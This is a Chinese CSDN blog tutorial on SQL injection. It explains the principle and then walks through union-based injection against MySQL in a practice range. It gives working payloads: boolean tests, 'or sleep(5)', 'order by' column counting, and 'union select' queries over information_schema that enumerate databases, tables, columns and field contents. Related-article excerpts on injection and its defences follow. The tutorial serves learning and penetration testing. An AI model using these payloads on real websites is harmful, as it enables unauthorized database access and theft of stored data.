SQL注入原理分析

最新推荐文章于 2024-08-26 19:00:00 发布
最新推荐文章于 2024-08-26 19:00:00 发布
阅读量197 收藏
点赞数
分类专栏: SQL 文章标签: sql 数据库 渗透测试 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/120949218
版权

目录

SQL注入的本质

显错注入-联合查询(Mysql数据库)的基本流程

显错注入靶场的做法

如果文章对你有帮助,欢迎关注、点赞、收藏一键三连支持以下哦!

想要一起交流学习的小伙伴可以加zkaq222(备注CSDN,不备注通不过哦)进入学习,共同学习进步

SQL注入的本质

注入攻击的本质: 把用户输入的数据当做代码执行

两个关键条件:

第一个是用户能够控制输入

第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行

针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行

显错注入-联合查询(Mysql数据库)的基本流程

 

重要知识点: 通过系统自带库查询数据

通过系统自带库查询数据 Mysql在5.0以上版本加入了information_schema 这个系统自带库

其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等

information_schema.tables存放表名和库名的对应

information_schema.columns存放字段名和表名的对应

注: 【information_schema.tables 实际上是选中information_schema库中的tables表】

显错注入靶场的做法

1.判断注入点

最古老的方法:       and 1=1 页面正常       and 1=2  页面不正常

最简单的方法:       页面后面加',看是否报错

好用的方法:          如果是数字型传参,可以尝试-1

例如:    http://www.xxx.com/new.php?id=1   页面显示id=1的新闻

http://www.xxx.com/new.php?id=2-1  页面显示id=1的新闻

and 1=1 and 1=2 被拦截的可能性太高了

可以尝试 and -1=-1 and -1=-2 and 1>0  or 1=1

或者直接 or sleep(5)

2. 判断当前页面字段总数

and 1=1 order by 1,2,3,4,5……

3.判断显示位

and 1=2 union select 1,2,3,4,5,6,7……

4.查当前数据库

and 1=2 union select 1,2,database()

5.查表名

and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

6.查列名

and 1=2 union select 1,2,column_name from information_schema.columns where table_name=表名 and table_schema=database() limit 0,1

7.查字段内容

and 1=2 union select 1,字段名,字段名 from 表名 limit 0,1

注:函数GROUP_CONCAT将多行数据进行整合在一行输出

 

渗透测试老鸟-九青
关注
专栏目录
SQL注入攻击原理以及基本方法
Toby的博客
10-07 8万+
一、SQL注入的概述 定义:SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。                                     为了更直观的让大家了解到sql注入原理,贴上一张sql注入攻击示意图
四、注入(1)SQL注入原理分析
weixin_45540609的博客
04-14 379
一、本质 用户输入的数据当做代码执行 条件: 用户能控制输入 原本程序要执行的代码,拼接了用户输入的数据后执行 应用场景:任何和数据库交互的传参 二、分析 1、判断 (1)and and 1=1 正确 and 1=2 错误 有几率有SQL注入 (2)加减乘除符号 但输入id=2-1,返回id=1的页面的时候,类似,加减乘除运算生效,一定存在SQL注入漏洞 ps:url栏里内容经过url编码,会把空格编码成+,所以要输入+,则需要转编码为%2b,在站长工具URL编码中转换 (..
SQL注入攻击的原理及其防范措施
12-16
SQL注入攻击的原理及其防范措施
深入理解 SQL 注入漏洞原理
最新发布
2301_77160226的博客
08-26 974
SQL 注入漏洞是一种非常危险的安全漏洞,它可以导致严重的数据泄露和系统破坏。通过了解 SQL 注入漏洞的原理和危害,以及采取相应的防范措施,我们可以有效地保护 Web 应用程序和数据库安全。在开发 Web 应用程序时,应该始终将安全性放在首位,对用户输入进行严格的验证和过滤,使用参数化查询等安全技术,以防止 SQL 注入漏洞的发生。它可以让攻击者通过在输入数据中嵌入恶意 SQL 语句,从而获取或篡改数据库中的数据,甚至控制数据库服务器。它允许用户执行各种操作,如查询、插入、更新和删除数据等。
sql注入攻击详解(原理理解)
热门推荐
~ Caesar's wish书屋 ~
12-14 3万+
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢?    
SQL注入攻击原理及防御策略
HoewDec的博客
02-23 2303
一.什么是SQL注入 SQL注入,一般指web应用程序对用户输入数据的合法性没有校验或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 总的来说就是,攻击者通过系统正常的输入数据的功能,输入恶意数据,而系统又未作任何的校验,直接信任了用户输入,使得恶意输入改变原本的SQL逻辑或者执行了额外的SQL脚本达,从而造成了SQL注入攻击。 二.SQL注入的危害及
sql注入攻击原理
完颜振江
03-01 2068
应用程序在未正确过滤或者验证用户输入数据的情况下,将恶意的 SQL 查询与应用程序原本的查询逻辑组合在一起,并发送到后端数据库服务器执行。SQL 注入攻击是一种常见的网络安全攻击,利用了应用程序对用户输入数据的不正确处理,导致恶意用户能够在 SQL 查询中插入恶意的 SQL 代码,以执行未经授权的数据库操作。总是为真,因此查询语句的条件总是为真,无论密码是什么,都将返回一个用户记录,从而绕过了身份验证,使攻击者成功登录到系统中。:定期监控应用程序的数据库活动,并记录潜在的 SQL 注入攻击尝试。
使用PDO防sql注入原理分析
12-16
本文使用pdo的预处理方式可以避免sql注入。下面话不多说了,来一起看看详细的介绍吧 在php手册中’PDO–预处理语句与存储过程’下的说明: 很多更成熟的数据库都支持预处理语句的概念。什么是预处理语句?可以把它...
计算机病毒与防护:SQL注入原理.ppt
06-10
**计算机病毒与防护:SQL注入原理** SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的Web应用程序。这种攻击手段是由于应用程序在处理用户输入时没有进行充分的验证和过滤,使得攻击者可以...
SQL注入介绍与原理分析
03-28
下面将详细阐述SQL注入原理、常见类型及其防范措施。 一、SQL注入原理 SQL注入的基础在于应用程序没有充分验证或转义用户提供的输入。当用户提交的数据被直接拼接到SQL查询中时,恶意输入就可能改变查询的原始...
SQL注入攻击原理分析及JavaWeb环境下的防范措施.pdf
07-23
本文在分析SQL 注入原理的基础上,提出了几点Java Web 环境下防范措施。   随着Ineternet 技术的迅猛发展,为了能更充分地使用互联网这个世界上最大的交流平台,许多单位或个人纷纷建立自己的网站。但是...
sql注入攻击原理分析
08-26
sql注入攻击原理分析 sql注入攻击原理分析 sql注入攻击原理分析
SQL注入攻击的原理及防御
02-14
SQL注入攻击的原理及防御
sql注入攻击原理及攻防
10-29
sql注入攻击原理及攻防,可以帮助你深入理解sql注入攻击的原理和进阶操作!
SQL注入之——SQL攻击原理
温柔小薛的博客
04-01 1000
攻击原理 sql注入危害概述 只要前段与数据库有交互的都有可能出现问题 SQL 注入式攻击技术,一般针对基于 Web 平台的应用程序或者APP程序 由于程序员在编写 Web 程序时,没有对浏览器端提交的参数进行严格的过滤和判断。 用户可以修改构造参数,提交 SQL 查询语句,并传递至服务器端, 从而获取想要的敏感信息,甚至执行危险的代码或系统命令。 注射式攻击的原理 注射式攻击的根源...
SQL注入攻击:原理、风险与防范
爱生活爱学习。
04-24 825
SQL注入攻击是一种常见的网络安全威胁,通过在Web应用程序中注入恶意的SQL查询语句,从而获取敏感信息、篡改数据库内容或实施其他恶意行为。本文将解释SQL注入攻击的原理、可能带来的风险,并提出防范这种类型攻击的有效措施。
网络安全SQL注入攻击的原理
m0_61869253的博客
03-21 639
保护产品免受SQL注入是必不可少的,以确保其正常运行并防止数据泄露。当您编写访问数据库的代码时,考虑从一开始就防止SQL注入是一种很好的做法。这是防止这些漏洞发生的最佳时机,而不是以后修补它们。开发过程应包括针对SQL注入的测试,然后是外部扫描程序。应用程序防火墙 - WAF还可以检测和阻止对您的应用程序的攻击。保护产品免受SQL注入是必不可少的,以确保其正常运行并防止数据泄露。当您编写访问数据库的代码时,考虑从一开始就防止SQL注入是一种很好的做法。
Java程序员从笨鸟到菜鸟之(一百)sql注入攻击详解(一)sql注入原理详解
红太阳照大地
10-24 210
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢? 所谓SQL...
sql注入攻击详解(一)sql注入原理详解
cetinlo的博客
05-31 1585
一、什么是sql注入呢?         所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过
SQL注入漏洞分析与防护策略
这篇论文深入探讨了SQL注入攻击的原理、步骤以及相应的防范措施。SQL注入是一种常见的网络安全问题,攻击者通过在用户输入的数据中嵌入恶意的SQL代码,以获取未经授权的服务器信息或者执行恶意操作。以下是对论文...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值